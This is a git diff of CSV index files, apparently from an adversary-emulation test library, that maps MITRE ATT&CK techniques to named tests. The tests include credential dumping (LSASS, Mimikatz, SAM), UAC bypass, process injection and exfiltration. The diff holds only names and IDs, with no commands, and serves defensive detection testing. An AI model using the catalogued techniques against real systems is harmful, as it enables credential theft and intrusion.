-credential-access,T1555.003,Credentials from Web Browsers,2,Search macOS Safari Cookies,c1402f7b-67ca-43a8-b5f3-3143abedc01b,sh
-credential-access,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
-credential-access,T1555.001,Keychain,1,Keychain,1864fdec-ff86-4452-8c30-f12507582a93,sh
-credential-access,T1040,Network Sniffing,2,Packet Capture macOS,9d04efee-eff5-4240-b8d2-07792b873608,bash
-credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
-credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 241e57a5..2bcc0b8f 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -1,4 +1,66 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
+credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
+credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
+credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
+credential-access,T1555,Credentials from Password Stores,1,Extract Windows Credential Manager via VBA,234f9b7c-b53d-4f32-897b-b880a6c9ea7b,powershell
+credential-access,T1555.003,Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell
+credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt
+credential-access,T1552.002,Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt
+credential-access,T1552.002,Credentials in Registry,2,Enumeration for PuTTY Credentials in Registry,af197fd7-e868-448e-9bd5-05d1bcd9d9e5,command_prompt
+credential-access,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
+credential-access,T1552.006,Group Policy Preferences,1,GPP Passwords (findstr),870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f,command_prompt
+credential-access,T1552.006,Group Policy Preferences,2,GPP Passwords (Get-GPPPassword),e9584f82-322c-474a-b831-940fd8b4455c,powershell
+credential-access,T1558.003,Kerberoasting,1,Request for service tickets,3f987809-3681-43c8-bcd8-b3ff3a28533a,powershell
+credential-access,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
+credential-access,T1003.004,LSA Secrets,1,Dumping LSA Secrets,55295ab0-a703-433b-9ca4-ae13807de12f,command_prompt
+credential-access,T1003.001,LSASS Memory,1,Windows Credential Editor,0f7c5301-6859-45ba-8b4d-1fac30fc31ed,command_prompt
+credential-access,T1003.001,LSASS Memory,2,Dump LSASS.exe Memory using ProcDump,0be2230c-9ab3-4ac2-8826-3199b9a0ebf8,command_prompt
+credential-access,T1003.001,LSASS Memory,3,Dump LSASS.exe Memory using comsvcs.dll,2536dee2-12fb-459a-8c37-971844fa73be,powershell
+credential-access,T1003.001,LSASS Memory,4,Dump LSASS.exe Memory using direct system calls and API unhooking,7ae7102c-a099-45c8-b985-4c7a2d05790d,command_prompt
+credential-access,T1003.001,LSASS Memory,5,Dump LSASS.exe Memory using Windows Task Manager,dea6c349-f1c6-44f3-87a1-1ed33a59a607,manual
+credential-access,T1003.001,LSASS Memory,6,Offline Credential Theft With Mimikatz,453acf13-1dbd-47d7-b28a-172ce9228023,command_prompt
+credential-access,T1003.001,LSASS Memory,7,LSASS read with pypykatz,c37bc535-5c62-4195-9cc3-0517673171d8,command_prompt
+credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
+credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
+credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
+credential-access,T1003.003,NTDS,4,Create Volume Shadow Copy with WMI,224f7de0-8f0a-4a94-b5d8-989b036c86da,command_prompt
+credential-access,T1003.003,NTDS,5,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell
+credential-access,T1003.003,NTDS,6,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt
+credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
+credential-access,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
+credential-access,T1003,OS Credential Dumping,1,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell
+credential-access,T1003,OS Credential Dumping,2,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
+credential-access,T1003,OS Credential Dumping,3,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
+credential-access,T1110.002,Password Cracking,1,Password Cracking with Hashcat,6d27df5d-69d4-4c91-bc33-5983ffe91692,command_prompt
+credential-access,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
+credential-access,T1110.001,Password Guessing,1,Brute Force Credentials,09480053-2f98-4854-be6e-71ae5f672224,command_prompt
+credential-access,T1110.003,Password Spraying,1,Password Spray all Domain Users,90bc2e54-6c84-47a5-9439-0a2a92b4b175,command_prompt
+credential-access,T1110.003,Password Spraying,2,Password Spray (DomainPasswordSpray),263ae743-515f-4786-ac7d-41ef3a0d4b2b,powershell
+credential-access,T1552.004,Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-f8347f632696,command_prompt
+credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
+credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
+credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
+credential-access,T1003.002,Security Account Manager,4,PowerDump Registry dump of SAM for hashes and usernames,804f28fc-68fc-40da-b5a2-e9d0bce5c193,powershell
+collection,T1560,Archive Collected Data,1,Compress Data for Exfiltration With PowerShell,41410c60-614d-4b9d-b66e-b0192dd9c597,powershell
+collection,T1560.001,Archive via Utility,1,Compress Data for Exfiltration With Rar,02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0,command_prompt
+collection,T1560.001,Archive via Utility,2,Compress Data and lock with password for Exfiltration with winrar,8dd61a55-44c6-43cc-af0c-8bdda276860c,command_prompt
+collection,T1560.001,Archive via Utility,3,Compress Data and lock with password for Exfiltration with winzip,01df0353-d531-408d-a0c5-3161bf822134,command_prompt
+collection,T1560.001,Archive via Utility,4,Compress Data and lock with password for Exfiltration with 7zip,d1334303-59cb-4a03-8313-b3e24d02c198,command_prompt
+collection,T1123,Audio Capture,1,using device audio capture commandlet,9c3ad250-b185-4444-b5a9-d69218a10c95,powershell
+collection,T1119,Automated Collection,1,Automated Collection Command Prompt,cb379146-53f1-43e0-b884-7ce2c635ff5b,command_prompt
+collection,T1119,Automated Collection,2,Automated Collection PowerShell,634bd9b9-dc83-4229-b19f-7f83ba9ad313,powershell
+collection,T1119,Automated Collection,3,Recon information for export with PowerShell,c3f6d794-50dd-482f-b640-0384fbb7db26,powershell
+collection,T1119,Automated Collection,4,Recon information for export with Command Prompt,aa1180e2-f329-4e1e-8625-2472ec0bfaf3,command_prompt
+collection,T1115,Clipboard Data,1,Utilize Clipboard to store or execute commands from,0cd14633-58d4-4422-9ede-daa2c9474ae7,command_prompt
+collection,T1115,Clipboard Data,2,Execute Commands from Clipboard using PowerShell,d6dc21af-bec9-4152-be86-326b6babd416,powershell
+collection,T1115,Clipboard Data,4,Collect Clipboard Data via VBA,9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52,powershell
+collection,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
+collection,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
+collection,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
+collection,T1074.001,Local Data Staging,1,Stage data from Discovery.bat,107706a5-6f9f-451a-adae-bab8c667829f,powershell
+collection,T1074.001,Local Data Staging,3,Zip a Folder with PowerShell for Staging in Temp,a57fbe4b-3440-452a-88a7-943531ac872a,powershell
+collection,T1114.001,Local Email Collection,1,Email Collection with PowerShell Get-Inbox,3f1b5096-0139-4736-9b78-19bcb02bb1cb,powershell
+collection,T1113,Screen Capture,5,Windows Screencapture,3c898f62-626c-47d5-aad2-6de873d69153,powershell
privilege-escalation,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
privilege-escalation,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
privilege-escalation,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
@@ -7,14 +69,14 @@ privilege-escalation,T1546.011,Application Shimming,2,New shim database files cr
privilege-escalation,T1546.011,Application Shimming,3,Registry key creation and/or modification events for SDB,9b6a06f9-ab5e-4e8d-8289-1df4289db02f,powershell
privilege-escalation,T1055.004,Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
privilege-escalation,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
-privilege-escalation,T1548.002,Bypass User Access Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
-privilege-escalation,T1548.002,Bypass User Access Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
-privilege-escalation,T1548.002,Bypass User Access Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
-privilege-escalation,T1548.002,Bypass User Access Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell
-privilege-escalation,T1548.002,Bypass User Access Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
-privilege-escalation,T1548.002,Bypass User Access Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
-privilege-escalation,T1548.002,Bypass User Access Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
-privilege-escalation,T1548.002,Bypass User Access Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
+privilege-escalation,T1548.002,Bypass User Account Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell
+privilege-escalation,T1548.002,Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
+privilege-escalation,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
+privilege-escalation,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
@@ -34,7 +96,9 @@ privilege-escalation,T1134.004,Parent PID Spoofing,5,Parent PID Spoofing - Spawn
privilege-escalation,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
privilege-escalation,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell
privilege-escalation,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
+privilege-escalation,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
privilege-escalation,T1055,Process Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
+privilege-escalation,T1055,Process Injection,2,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt
privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,2,Reg Key RunOnce,554cbd88-cde1-4b56-8168-0be552eed9eb,command_prompt
privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,3,PowerShell Registry RunOnce,eb44f842-0457-4ddc-9b92-c4caa144ac42,powershell
@@ -45,6 +109,7 @@ privilege-escalation,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fe
privilege-escalation,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
privilege-escalation,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
privilege-escalation,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
+privilege-escalation,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
privilege-escalation,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
privilege-escalation,T1547.005,Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
privilege-escalation,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
@@ -65,19 +130,21 @@ defense-evasion,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a1
defense-evasion,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell
defense-evasion,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt
defense-evasion,T1197,BITS Jobs,4,Bits download using destktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt
-defense-evasion,T1548.002,Bypass User Access Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
-defense-evasion,T1548.002,Bypass User Access Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
-defense-evasion,T1548.002,Bypass User Access Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
-defense-evasion,T1548.002,Bypass User Access Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell
-defense-evasion,T1548.002,Bypass User Access Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
-defense-evasion,T1548.002,Bypass User Access Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
-defense-evasion,T1548.002,Bypass User Access Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
-defense-evasion,T1548.002,Bypass User Access Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
+defense-evasion,T1548.002,Bypass User Account Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell
+defense-evasion,T1548.002,Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
+defense-evasion,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
+defense-evasion,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt
defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt
defense-evasion,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
defense-evasion,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
defense-evasion,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
+defense-evasion,T1070.003,Clear Command History,9,Prevent Powershell History Logging,2f898b81-3e97-4abb-bc3f-a95138988370,powershell
+defense-evasion,T1070.003,Clear Command History,10,Clear Powershell History by Deleting History File,da75ae8d-26d6-4483-b0fe-700e4df4f037,powershell
defense-evasion,T1070.001,Clear Windows Event Logs,1,Clear Logs,e6abb60e-26b8-41da-8aae-0c35174b0967,command_prompt
defense-evasion,T1070.001,Clear Windows Event Logs,2,Delete System Logs Using Clear-EventLog,b13e9306-3351-4b4b-a6e8-477358b0b498,powershell
defense-evasion,T1027.004,Compile After Delivery,1,Compile After Delivery using csc.exe,ffcdbd6a-b0e8-487d-927a-09127fe9a206,command_prompt
@@ -184,7 +251,9 @@ defense-evasion,T1550.003,Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf3
defense-evasion,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
defense-evasion,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
defense-evasion,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
+defense-evasion,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
defense-evasion,T1055,Process Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
+defense-evasion,T1055,Process Injection,2,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
defense-evasion,T1216.001,PubPrn,1,PubPrn.vbs Signed Script Bypass,9dd29a1f-1e16-4862-be83-913b10a88f6c,command_prompt
defense-evasion,T1218.009,Regsvcs/Regasm,1,Regasm Uninstall Method Call Test,71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112,command_prompt
defense-evasion,T1218.009,Regsvcs/Regasm,2,Regsvcs Uninstall Method Call Test,fd3c1c6a-02d2-4b72-82d9-71c527abb126,powershell
@@ -215,6 +284,8 @@ defense-evasion,T1218,Signed Binary Proxy Execution,2,SyncAppvPublishingServer -
defense-evasion,T1218,Signed Binary Proxy Execution,3,Register-CimProvider - Execute evil dll,ad2c17ed-f626-4061-b21e-b9804a6f3655,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,4,InfDefaultInstall.exe .inf Execution,54ad7d5a-a1b5-472c-b6c4-f8090fb2daef,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,5,ProtocolHandler.exe Downloaded a Suspicious File,db020456-125b-4c8b-a4a7-487df8afb5a2,command_prompt
+defense-evasion,T1218,Signed Binary Proxy Execution,6,Microsoft.Workflow.Compiler.exe Payload Execution,7cbb0f26-a4c1-4f77-b180-a009aa05637e,powershell
+defense-evasion,T1218,Signed Binary Proxy Execution,7,Renamed Microsoft.Workflow.Compiler.exe Payload Executions,4cc40fd7-87b8-4b16-b2d7-57534b86b911,powershell
defense-evasion,T1216,Signed Script Proxy Execution,1,SyncAppvPublishingServer Signed Script PowerShell Command Execution,275d963d-3f36-476c-8bef-a2a3960ee6eb,command_prompt
defense-evasion,T1216,Signed Script Proxy Execution,2,manage-bde.wsf Signed Script Command Execution,2a8f2d3c-3dec-4262-99dd-150cb2a4d63a,command_prompt
defense-evasion,T1497.001,System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
@@ -280,6 +351,7 @@ persistence,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db
persistence,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
persistence,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
persistence,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
+persistence,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
persistence,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
persistence,T1547.005,Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
persistence,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
@@ -411,25 +483,6 @@ command-and-control,T1219,Remote Access Software,2,AnyDesk Files Detected Test o
command-and-control,T1219,Remote Access Software,3,LogMeIn Files Detected Test on Windows,d03683ec-aae0-42f9-9b4c-534780e0f8e1,powershell
command-and-control,T1071.001,Web Protocols,1,Malicious User Agents - Powershell,81c13829-f6c9-45b8-85a6-053366d55297,powershell
command-and-control,T1071.001,Web Protocols,2,Malicious User Agents - CMD,dc3488b0-08c7-4fea-b585-905c83b48180,command_prompt
-collection,T1560,Archive Collected Data,1,Compress Data for Exfiltration With PowerShell,41410c60-614d-4b9d-b66e-b0192dd9c597,powershell
-collection,T1560.001,Archive via Utility,1,Compress Data for Exfiltration With Rar,02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0,command_prompt
-collection,T1560.001,Archive via Utility,2,Compress Data and lock with password for Exfiltration with winrar,8dd61a55-44c6-43cc-af0c-8bdda276860c,command_prompt
-collection,T1560.001,Archive via Utility,3,Compress Data and lock with password for Exfiltration with winzip,01df0353-d531-408d-a0c5-3161bf822134,command_prompt
-collection,T1560.001,Archive via Utility,4,Compress Data and lock with password for Exfiltration with 7zip,d1334303-59cb-4a03-8313-b3e24d02c198,command_prompt
-collection,T1123,Audio Capture,1,using device audio capture commandlet,9c3ad250-b185-4444-b5a9-d69218a10c95,powershell
-collection,T1119,Automated Collection,1,Automated Collection Command Prompt,cb379146-53f1-43e0-b884-7ce2c635ff5b,command_prompt
-collection,T1119,Automated Collection,2,Automated Collection PowerShell,634bd9b9-dc83-4229-b19f-7f83ba9ad313,powershell
-collection,T1119,Automated Collection,3,Recon information for export with PowerShell,c3f6d794-50dd-482f-b640-0384fbb7db26,powershell
-collection,T1119,Automated Collection,4,Recon information for export with Command Prompt,aa1180e2-f329-4e1e-8625-2472ec0bfaf3,command_prompt
-collection,T1115,Clipboard Data,1,Utilize Clipboard to store or execute commands from,0cd14633-58d4-4422-9ede-daa2c9474ae7,command_prompt
-collection,T1115,Clipboard Data,2,Execute Commands from Clipboard using PowerShell,d6dc21af-bec9-4152-be86-326b6babd416,powershell
-collection,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
-collection,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
-collection,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
-collection,T1074.001,Local Data Staging,1,Stage data from Discovery.bat,107706a5-6f9f-451a-adae-bab8c667829f,powershell
-collection,T1074.001,Local Data Staging,3,Zip a Folder with PowerShell for Staging in Temp,a57fbe4b-3440-452a-88a7-943531ac872a,powershell
-collection,T1114.001,Local Email Collection,1,Email Collection with PowerShell Get-Inbox,3f1b5096-0139-4736-9b78-19bcb02bb1cb,powershell
-collection,T1113,Screen Capture,5,Windows Screencapture,3c898f62-626c-47d5-aad2-6de873d69153,powershell
execution,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
execution,T1559.002,Dynamic Data Exchange,1,Execute Commands,f592ba2a-e9e8-4d62-a459-ef63abd819fd,manual
execution,T1559.002,Dynamic Data Exchange,2,Execute PowerShell script via Word DDE,47c21fb6-085e-4b0d-b4d2-26d72c3830b3,command_prompt
@@ -463,10 +516,12 @@ execution,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86
execution,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
execution,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
execution,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
+execution,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
execution,T1569.002,Service Execution,1,Execute a Command as a Service,2382dee2-a75f-49aa-9378-f52df6ed3fb1,command_prompt
execution,T1569.002,Service Execution,2,Use PsExec to execute a command on a remote host,873106b7-cfed-454b-8680-fa9f6400431c,command_prompt
execution,T1059.005,Visual Basic,1,Visual Basic script execution to gather local computer information,1620de42-160a-4fe5-bbaf-d3fef0181ce9,powershell
execution,T1059.005,Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6-9c2f-633ac4f1eefa,powershell
+execution,T1059.005,Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a60-749652a03df6,powershell
execution,T1059.003,Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell
execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt
execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt
@@ -476,47 +531,6 @@ execution,T1047,Windows Management Instrumentation,5,WMI Execute Local Process,b
execution,T1047,Windows Management Instrumentation,6,WMI Execute Remote Process,9c8ef159-c666-472f-9874-90c8d60d136b,command_prompt
exfiltration,T1020,Automated Exfiltration,1,IcedID Botnet HTTP PUT,9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0,powershell
exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,2,Exfiltration Over Alternative Protocol - ICMP,dd4b4421-2e25-4593-90ae-7021947ad12e,powershell
